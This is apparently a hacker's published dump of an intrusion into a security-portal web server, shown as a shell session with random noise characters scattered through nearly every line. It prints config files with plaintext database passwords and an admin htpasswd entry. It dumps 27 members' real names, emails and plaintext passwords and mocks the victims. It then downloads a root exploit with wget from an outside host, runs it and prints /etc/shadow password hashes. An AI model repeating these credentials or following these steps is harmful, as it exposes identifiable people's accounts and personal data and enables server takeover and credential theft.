: c3 ^. H8 {3 O9 x8 ish-3.2$ ls -la% J" H$ ^" Q" j& O8 |7 e
total 200
P9 z% E0 F/ o" s5 X7 V$ V/ h. bdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .: k- ]3 B- R8 g' X [
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 .. s& f9 h2 g1 P8 I. j1 y
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007! y1 v( A/ e+ e* L
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql3 v; _+ P* i: A' H6 s8 j
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com0 g/ ?$ n9 T, _
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend' ^7 F+ c/ V; {! _
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
2 j6 o1 l/ e6 j: m0 q( g. j3 t-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
/ Y' m3 J) M6 j( jdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
+ S! Z) e! X' q8 M" Z& ]drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron0 r6 @" U# u8 [3 N+ h+ V7 x6 u; z
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd! C, _2 G9 I3 Y9 ~
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
' K8 y; ^7 {5 X) M9 c8 q-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
% F3 l+ a4 ^/ G# F" n6 r3 ^drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed. W7 [4 x: K" s0 @" ~' i/ f3 A: P
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour8 u1 r7 b6 W6 X* u8 O3 i' Y# p
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess5 e: ` [/ M8 a: P
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
0 ]+ C0 P7 M5 B4 [& S- \: H6 E-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
& e$ X, [4 r7 A) A-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
: V; r {+ v2 A' L-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
2 c S) e3 c0 T: [4 N-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php, S+ q( D* `1 W: _6 d% e
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf' }5 b" V' m9 C5 `4 Z
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
% D" m! ]( x$ z% {drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
5 ~, A" K" t' ?+ j" wdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
* K7 R& [# {( T0 T3 [" rdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log" B% }/ ^. i6 A# v
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member9 {5 `" j8 Y# W V9 p
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
' e" ?( ]& \# s6 u/ G/ o( H Gdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new) ]# l1 V; q% ~. I+ J
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
T3 p0 A1 Y/ \& gdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
! j! l# @/ N) r; _-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
0 b- u1 F4 Y& H9 m N, idrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss2 e7 [' U, z' s* j# n; C0 C
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources5 ^/ L6 W5 t( l- R! v. y
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com, {, ~4 t# q/ g& u4 j1 P% S9 H2 b
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes6 p! R# I# w( E. Z1 P
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src8 ?% U7 Y+ s8 j3 H( p
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
" Y4 u5 |' ~' g/ rdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2& J' ~6 l3 B+ p! @( P, X+ c, s
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
4 H- T% [+ H% \3 W-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php/ d; E1 k4 z+ h; g/ D' P% D
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
1 G% z* {: T+ w' g Y. s( z- b5 p0 @. K) ^0 G M: p1 V
sh-3.2$ head -20 index.php
" x( t7 C! F: o& }+ `& J7 X. Y<?PHP; P2 I2 R: E0 g+ m+ G
/**% ^" o& a9 | e
* Mainfile (external) for astalavistaNET v2.0
! u9 r& t3 a3 i, _" D*7 U' Z" ?( O0 {: a: J) O
* @copyright Astalavista IT Engineering GmbH
7 G; ?+ h6 d7 o [* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
B/ w$ |" W/ x/ O* @version 1.03 v# f4 L8 d: D
*/
$ @2 H3 f4 ^4 H. V( U; Q
; @1 R) o, T9 f! G0 j' I; ^ if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
3 T. _1 k/ r/ Q, g $dontStartSession = false;" e6 x8 Y+ J b! N- k$ k% w2 q
} else {0 M B3 o( b) y% }
$dontStartSession = true;5 q+ S& Q+ C. ?3 H$ n ~
}
" s$ `$ r9 r9 s: `% \/ g! R. d require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);' z/ i H" \3 M* S" m! r% s
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);1 B3 V: z" ^0 U% D( c* l
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
y7 K$ v: K& X9 [+ c2 |, ~ require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
, P5 Q# i1 T& w4 ]* G
1 a. g7 u1 r: b! d7 E: {sh-3.2$ cd config( E% M b; O5 D+ l1 {$ U1 v5 \
sh-3.2$ ls -la }6 ^% B6 q0 l
total 32
+ r2 c& ]2 H) [drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
% Z) \# q. V7 I7 g: Kdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..! r6 b4 R# Y# L( J
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php" t* y6 y) D( p, O) w: J( ?( v: P
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
4 r" H. J* d1 r, \ O4 Q-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php, ~- [7 P5 s+ i5 r6 r5 n: C/ J9 I+ ^
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php5 o. c1 G" C7 `
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php, f& p1 \" U. Y7 l: ?. H& X W
/ H0 Q5 N* s. q: ~sh-3.2$ cat com.conf.php3 g( Q& X: n3 G! C8 F3 C
[snip]
/ m* d/ F y5 O5 Q; @' L% s//member-database9 \4 b# B5 s: S! P" d* J b1 T' k4 ^9 `0 J
$_CONFIG['db_mem_server'] = ‘localhost’;9 i* Q. h. U- r
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;$ d) c& B1 g2 C
$_CONFIG['db_mem_user'] = ‘astanet_db’;) I) |3 f, a' P7 U3 C' I. m
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;: t; }, c8 n7 w" A! U8 |
$_CONFIG['db_mem_debug'] = false; //true or false+ t" f2 ?- b( p' F
//ads-database8 Y# H( t4 X; L, M
$_CONFIG['db_ads_server'] = ‘localhost’;
, V+ a6 V" r" c( Q1 }2 c: r6 F$_CONFIG['db_ads_database'] = ‘astanet_ads’;
- }- q1 L. C) y9 c2 O5 O2 `4 ~( ~$_CONFIG['db_ads_user'] = ‘astanet_db’;
2 S! l8 u0 g" Z/ I8 B7 g/ P$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;( v/ |0 Q6 o( h/ L7 m9 b! W7 U
$_CONFIG['db_ads_debug'] = false; //true or false
# W% i! \4 K* ^/ z4 X- n$ I; U Q; x8 a//rainbow-database
2 T( T" t$ i0 H% C# Q2 `$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;" k, r* S! o9 ~* F
$_CONFIG['db_rainbow_database'] = ‘rainbow’;/ ]& V8 |# i4 j; s7 m
$_CONFIG['db_rainbow_user'] = ‘dinu’;+ M* A5 S# z4 Y$ n/ V( [
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
4 s5 u: e% ?5 J$_CONFIG['db_rainbow_debug'] = false; //true or false
8 n) X7 u# w. f. Y; R* r//mailing lists database
, ?% U& a( r$ C* d7 Z$ m$ Z$_CONFIG['db_mailing_lists_server'] = ‘localhost’;. X; N# ^5 e" ^& |
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;3 U- @8 b" x5 }* Z _1 v& r, L
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
$ \/ @9 U; v7 H: e( j$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;$ L7 \) A6 z" f! y, Y4 {6 q. h
$_CONFIG['db_mailing_lists_debug'] = false; //true or false) T: h( ]$ J `, @2 k" p: t" S
//paypal% N" [& V7 ^. a. K+ q' [3 s$ k
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
8 }- D# \/ P! q% P' { ~$_CONFIG['sub_pp_cmd'] = ‘_xclick’;1 D p& H" b" O$ b3 A, |% t
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
# t- Q3 l" c# @& E6 V1 L$_CONFIG['sub_pp_noship'] = ‘1′;
( N" ^ V5 R. m' e/ }$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;1 F5 p6 A0 n8 w R8 f
[snip]
R* w3 ~! K; G) v# L( H& W7 t; t( y& K B
sh-3.2$ cd ..: J8 W% b$ ]3 v
sh-3.2$ cd member
m! U( `( x2 r9 d4 t; e( Nsh-3.2$ ls -la3 o3 G, L+ k. \$ C X
total 20
0 y/ I5 H* F8 c: S7 D" M5 ldrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .5 }% ^5 A; _$ `1 D* Y
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
6 M; n1 i* w6 a2 Q$ k! Z) v7 r4 p) j-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess) x2 g- [- X S4 f& j: j! w& K( d' D
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php T9 w) @7 R, W$ a# W0 a, W
sh-3.2$ cat .htaccess- v! z$ Q5 a- t) A/ Q( h
SecFilterEngine off
f% R6 ^ O5 s7 c9 V. ]
: _6 J$ O9 E( I& {sh-3.2$ cd ..
2 H$ k! ]) j1 [0 y5 w7 g9 X" o; D/ esh-3.2$ cd cron' L' H+ y( f: ]2 a1 `7 O) W3 I
sh-3.2$ ls -la
& F/ N& c* Q% Atotal 1688 x% a) Z7 q$ G, V
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
* J m/ _/ S) E; ldrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
. a/ k* o6 b; ]# Q5 _* W; N- I-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
$ w B1 q. | y0 v- v6 H-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
+ r. Q; |6 R+ v9 `-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
J" e4 c( @- t( u-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
" C4 H4 M) z% `-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
4 w# o/ T- ?: `0 Y' e9 s" {-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php2 t4 {7 r V9 o, P; b
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php2 h0 v4 s, {: j, H4 x, K! o/ a6 T, t
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php: O# ~9 y' y. ]( R
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh- X: H ?8 U2 J+ M9 G
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
# c& z# j4 l( v- V8 L8 c) J+ o, _-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php- g/ @+ o2 l( W' k
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
$ ?: ~2 a7 [+ G0 m9 P-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh2 c2 F/ j9 R# b1 V9 m( Z+ N4 E8 J
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php* { A- {( Z ^, s( k
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
& [( [$ l$ H4 f& N-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
9 g L' u# E) y6 N' j# v. J# u-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
6 X( g* J: R% Z-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
8 R& w" q# z7 J% a) |drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email- c# o2 {# @; p X# w0 [
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
1 a5 Y: P% S0 N ^-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
* `% e9 W9 t9 U$ J/ Y2 h- B
, s& H! q- s2 vsh-3.2$ cd ..4 N! h% {# k, W9 W/ d
sh-3.2$ cd _007
4 l, y8 \& T# b+ s" N" C& J/ ssh-3.2$ ls -la
7 T; H$ P& h v% etotal 247 p% l$ J" u( V) L
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
1 i+ u9 V9 c ^& Z8 hdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
: v' R0 m% p( V" r7 l& r-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
! |# W N$ c: f5 `$ w, d-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
) s2 |4 B+ o& ]0 O; r: x; J9 H1 L-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php2 Z" U; Z! l2 z1 j+ {& b
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
% V/ u; j+ y/ [) x) q( ~) K4 ?% b+ V% ?4 S- H
sh-3.2$ cat .htaccess
% W T9 V* p# I1 p$ n( P) v7 CauthType Basic# F* }' n9 E5 A$ L. N" g E% o
authName Admin
( T3 T0 s; a7 c: K' Y1 {authUserFile /home/astanet/auth/.htadm_pwd
( k' k/ U$ f+ l y7 P' rrequire valid-user% g+ e+ o% _6 r, c) S
( ^+ Q1 l2 T7 B8 ?1 {3 }sh-3.2$ cat /home/astanet/auth/.htadm_pwd+ U9 R- ?5 o& V
admin2net:CR0bl65MwhfT
% f$ B% W$ S- \
# U& v4 ~" E# k, f/ l- W. C2 ]- jsh-3.2$ mysql -u astanet_db -p: I( [1 R4 u* U6 i4 ?2 M
Enter password:
5 c/ n8 q( Q4 t) S- ^1 o9 MWelcome to the MySQL monitor. Commands end with ; or \g. u8 i! W7 G6 t: z" Q# ?- \
Your MySQL connection id is 275153" R# E5 R7 ^+ I+ ]) H, [. ?
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
9 p7 X7 H# H. N P- U/ ~. J# `( s' p% Y% e$ W3 `8 f
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
# H3 ~. E) v0 d- o0 e
7 ~& A* E3 n+ ]7 jmysql> show databases;. d$ `) a; _% d* f8 Q% J8 O
+———————–+3 r+ @4 f' R9 `% u! c, t
| Database |+ R: z8 h( G; K: Y( C
+———————–+
1 C' |" w- _6 [$ Q* [5 b| information_schema |6 F' W! U1 G' J3 |' @, y
| astanet_ads |
6 [) `0 P7 O: w& o7 ?# g| astanet_mailing_lists |
! W- a6 e5 w1 O| astanet_mediawiki |
' Y+ `' n) c3 v9 R| astanet_membersystem |
4 w0 l4 Y/ e: ^ {6 \| test |
" y+ [8 G( X2 u) G$ l; _0 s+———————–+5 I* a5 t& _" Z
6 rows in set (0.00 sec)
! R/ C6 q1 _1 T
: e% O$ N6 Y1 z( smysql> use astanet_membersystem
! z9 O/ i8 q4 LDatabase changed, O1 f( a z, ^8 [& `$ F$ O
mysql> show tables;
0 I1 w) X0 b' a7 C3 w+———————————–+
$ L) c* r0 X1 T| Tables_in_astanet_membersystem |
# a5 J; }- e: u: g+———————————–+
+ ]- Z7 j/ u$ Z O- X3 P( u- Q| blacklist_categories |
& h; A7 e+ }# g ?: a$ g| blacklist_content |3 d. Z* y& M. F& E6 S0 b' @9 P) t
| blacklist_levels |
& j4 v6 i( [# G! ]$ ?% T| blacklist_mcset |
+ n7 o; O3 H( D) Q6 c! o# M! ~| dir_categories |
% ^, W, u5 i: g. ~; a| dir_comments | X. X7 ]/ k9 w
| dir_links |( S" j; N3 E$ Y" e& g B
| dir_temp |5 N/ P1 n0 P1 z% Y q+ v
| dir_votes |# E! n3 S2 b) |8 Z
| documents |
3 g9 c0 T. y- d| documents_categories |
$ `- T3 v% f% s5 G, ]: [8 j| email_content |
! `7 t' f: D4 x) F| email_settings |
. V" B4 O: z# W" m| exploits |
9 e% z( S2 `% e7 o: q/ q O| exploits_categories |
" d8 y6 r$ w0 [; L; L& @| exploittree_categories |
2 b% [5 U! o1 T3 {0 m& ^' j( C& W# l| exploittree_exploits |5 b Q! l' E' J" x+ w3 f
| home_values |
5 _/ ?2 V* j1 Z1 K: s- ], d| iso_countries |0 J5 a9 l3 z( l% x
| links_categories |9 Y6 f5 R& o) _& l4 P. m0 q* c/ L
| links_records |: m! f' [! b. M* z# W% W
| links_unauth |5 {) B2 q" `) | s7 E
| links_votes | N, e# g( ~9 U1 I- D/ a4 j
| log |7 |1 n; V ]6 U
| news_categories |, c% d( L# Z7 a% V- s$ `+ V$ w" r5 S
| news_comments |% |# I6 c" u @) P% {! Z: |8 s
| news_emoticons |/ Q7 I9 _9 {4 z
| news_latest |+ g& P( I7 @! W9 v# i9 q; c
| news_messages |4 n i6 W# `8 o" I
| news_statistics |
7 x5 C" S) o. E, _! J* z; ~| news_votes |
6 t" L! p; s; O2 E" P" k0 o| prices_content |0 L( N; N5 L0 l7 _' {- c
| prices_offers |
2 z, |) i9 ^# J( G, I/ o6 v$ }1 t| rss_settings |. i3 x5 @8 i0 b. ~8 g; C6 M1 _
| sessions |' f' ^$ Z5 z# I }
| stats_signups |
. N+ @9 l: o- m2 d| u2u2 |$ X: I T6 S6 H
| u2u_contact |
- _9 A5 `8 f# w+ \' L6 J% j| u2u_settings |# Z6 ]2 s3 {) `; G
| user_keywords_selected_categories |
+ p- T: ^. |1 {| users |
& J; l6 ^0 Z1 J1 y| users_ipn_test |2 ~: n# @! S2 b: J% [, r# `
| users_keyword_values |
9 y0 e8 i+ ]( A$ _/ D m c# d| users_profile |
; y: d, E! C" |3 Y/ N| users_temp |4 f0 ?$ z$ O& ?* Y
| users_upgrade |
6 c# m, o$ C8 d& U+ }+———————————–+
" n- c2 E C: S9 i46 rows in set (0.00 sec)
5 V6 a2 S: j* ~0 d: `! s% l$ p7 [/ \. G" F4 c: ?" m; }: m
mysql> describe users;9 Z5 R! i" g5 s; f
+————————–+————————————–+——+—–+———————+—————-+ e( t8 {: A2 ~
| Field | Type | Null | Key | Default | Extra |; g2 i0 L+ f$ t6 p1 z
+————————–+————————————–+——+—–+———————+—————-+
: ^$ V2 b3 n9 G| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
$ `: { d4 [4 |) u# Z9 `$ b| user | varchar(50) | NO | | | |
* Q* U7 o. N/ v/ z8 P( d$ P5 U( r4 {| nickname | varchar(30) | NO | MUL | anonymous | |
. b% U) O( q: ~& ?| password | varchar(30) | NO | | | |' ^# |! @* G+ T: O& I: H4 _
| userlevel | tinyint(3) | YES | MUL | NULL | |
2 t: c+ J: s3 [1 A" L- |0 e| exp | int(8) unsigned | NO | | 0 | |; @6 S3 e+ ?" ~/ e# P1 J5 j, I
| email | varchar(50) | NO | | | |
$ L L( c7 V, l2 ]| ip | varchar(15) | NO | | 0 | |5 _! ^3 d3 ~; }; T
| proxy | set(’0′,’1′) | NO | | 0 | |
( o( a: X4 j' n. a* _| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
3 c; w( ]. D6 i z) D% K2 b| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |; }# V$ J6 ]# _1 X, ^
| anz_in | tinyint(1) | NO | | -1 | |
3 t; l* B& k1 ?* }8 B1 o. W| status | tinyint(1) unsigned | NO | | 0 | |2 r; ~0 U% W% B2 P+ x. g
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
0 p! w1 T+ W! s) U, `/ ]1 c" o| freemember | set(’0′,’1′) | NO | | 0 | |8 i+ m6 I; F4 o0 m$ K/ c
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | | g2 n1 d8 [( @- o
| lang | tinytext | NO | | | |) L* f- }* z# f- E( i
| adid | smallint(6) | NO | | 0 | |8 f& {; d9 s+ \0 [ e# c3 {, L8 }
| pp_txn_id | varchar(255) | YES | | NULL | |: t3 I# N7 A( `% N
| cnb_transaction_id | varchar(255) | YES | | NULL | |9 I: n) m& P# g# L
| cnb_order_id | varchar(255) | YES | | NULL | |; \: m" U$ L9 Q7 C" a
| cnb_user_id | int(11) | YES | | 0 | |
Y2 X7 y8 u) \% E) g7 V$ q+————————–+————————————–+——+—–+———————+—————-+ w, |# g* j @: Q7 Q$ m
22 rows in set (0.01 sec)# s1 o8 F* W+ }& h
1 {% I/ j$ ^: w3 s# k9 V
mysql> select count(*) as skids from users;
( g% S* f* i8 a9 t! P8 q$ F+——-+! p- R V: A9 K% p4 M
| skids |
h N: S6 I) ?: _8 {* d/ z5 c2 h+——-+
8 F6 w! w# j/ r9 [) M| 25199 |1 X. |* h* `! ]/ k$ `; n8 E# j5 X, J
+——-+
$ a/ @% o ~' z, c1 row in set (0.00 sec)
' Q: c& C( o6 L$ i0 [
; I0 a4 ?& v1 [$ c1 hmysql> select user,nickname,password,email from users where userlevel = 1;2 f! A0 j0 L5 M
+————————–+———————-+——————+———————————–+* q( Z( R' W+ P) `
| user | nickname | password | email |/ S# J- q% h# [' m3 e
+————————–+———————-+——————+———————————–+
# o$ B2 Q# z" K( n6 f% z5 V7 z| pascal | prozac | astaman3 | 链接标记info@astalavista.net |2 X8 m/ i, i6 {. D5 b! r) a
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |6 R2 |2 @; V* h% q" ^. |
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |* X5 b7 \1 j' Y* n) e- s6 y
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |& M' M& x: K! ^- Y6 q
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
, E4 P8 w3 r, d3 _7 X+ i| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |, u2 r0 f4 a6 T3 @9 f
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |6 \' M0 ?! w4 i1 j
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
; T8 e" z+ _8 M2 c| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
, _1 H. Q) E- Z2 E8 ~2 e. P1 f" o| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |. r8 v* x- k$ |5 B+ n, s
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
N, @9 K8 v$ r8 F9 Z7 V$ @| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |% \1 o8 ^+ ^9 }- B; E2 j4 A
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |# p$ Q3 @* Z( p# f- {/ r
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |0 @: [: v" ~3 ?# M3 G
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |% ^, D+ F: |' ?8 z) A9 \, r' e2 F' L* J
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
& _. q$ E( H" b| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |% v0 M4 V* V5 |& t- Q9 V, b
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |/ h$ R0 @ }, c/ T9 a. Z2 k. @( y
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |6 Z* x% |" H+ S5 i% v
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |& ^/ u G' D/ m( J4 {5 v/ j" |
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |; g8 [3 ` o* ^% }# I, O0 g
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
U' d% d }8 ^( y! j3 W, H% c| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |/ Z5 E7 o, \& E4 Z3 l) g
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
8 x0 _" P5 I2 a7 y! `9 r| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
) p7 e2 @% R; _| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |5 \- o# @) E% z- U% _# o9 c
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
9 K3 _$ P; T# T7 r V! s+————————–+———————-+——————+———————————–+ V0 X7 D' B. t8 \; S
27 rows in set (0.00 sec)8 C3 v1 Z4 y, w7 L9 n4 N
" i: ~/ |2 D8 M4 U
mysql> exit; z3 P. W+ w; e
Bye
& D* K& N7 C) _1 ]8 @# N* C5 h" E* u% q. @8 P' p
[~] plaintext passwords? yes,5 g0 G1 y& ?7 K" F
Those so called “security professionals” who charge you $6.66 / month to- c) _. q4 C/ ]& L5 M( Y
register at their hack-proof portal, save your passwords in plaintext…) i. c/ H$ W3 g% `6 T" `+ z$ g' C: P
brilliant!
, W! T7 o8 k. h1 D. m% G! D* v% ]! c& d' _$ W1 w
[~] This been fun but we want more.
- H0 H+ R4 |$ T. \; B
0 O7 `* ^4 O- f: C3 nsh-3.2$ uname -a$ P: y1 P9 l. T, n( y7 ]
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
/ d- C8 d6 w5 P$ K7 g" | osh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]" C9 O: W6 P0 n1 C% L) M. R' {
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
- }" T( u: v/ t" lResolving anti.sec.labs… 13.33.33.37
' ^6 t1 J0 n5 A5 M& }7 V$ u- IConnecting to anti.sec.labs|13.33.33.37|:80… connected.
7 \: [9 S' p- gHTTP request sent, awaiting response… 200 OK# ]8 ~6 Y+ h6 b m+ R; p2 `
Length: 18200 (18K) [text/plain]
# X0 f7 k2 I2 `: R2 G% d; V- hSaving to: `g0troot’
! _) k/ C- i( N+ S7 N( \1 c4 D( V. g. c
100%[=========================================================================================================================================>] 18,200 58.6K/s in4 h9 t% O4 w4 }4 u. q0 L( L
0.3s
4 x( M: f* b) _0 a) p' K: H; I, @8 f: r, C t& d' S
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
! q/ Y% ^; u+ I# X# c$ \# z( ~. Z! y4 b
sh-3.2$ ./g0troot -i x86_64
' p6 {9 Y w+ J& a9 o[+] g0troot - anti.sec.labs
/ w) ]5 \6 A" N$ Y[+] Target: 2.6.18-128.1.10.el5& ~; m3 J0 b2 H! q4 q
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]9 `) Q Y$ P% m; g( w0 Q1 D& o/ n
0 @- B: y5 \7 q* ~) E6 F[+] r00tr00t
" |4 J/ \, [; f# B& {[~] Executing shell…& ~' B! P* r9 p* r
9 g, Y. ?6 H- [8 f% q
sh-3.2# id
: A& w) [3 g. W% Q; ]$ ouid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
4 K1 ]% R4 P: O# ~6 R- B# z/ e% P0 z @: P
sh-3.2# cat /etc/shadow6 o8 w7 ~* q+ ^& r% s9 V. X
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::/ U; m: S' h8 y- x y
[snip]- \+ O- t1 P) W. r7 ?; s" a. ^; c
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
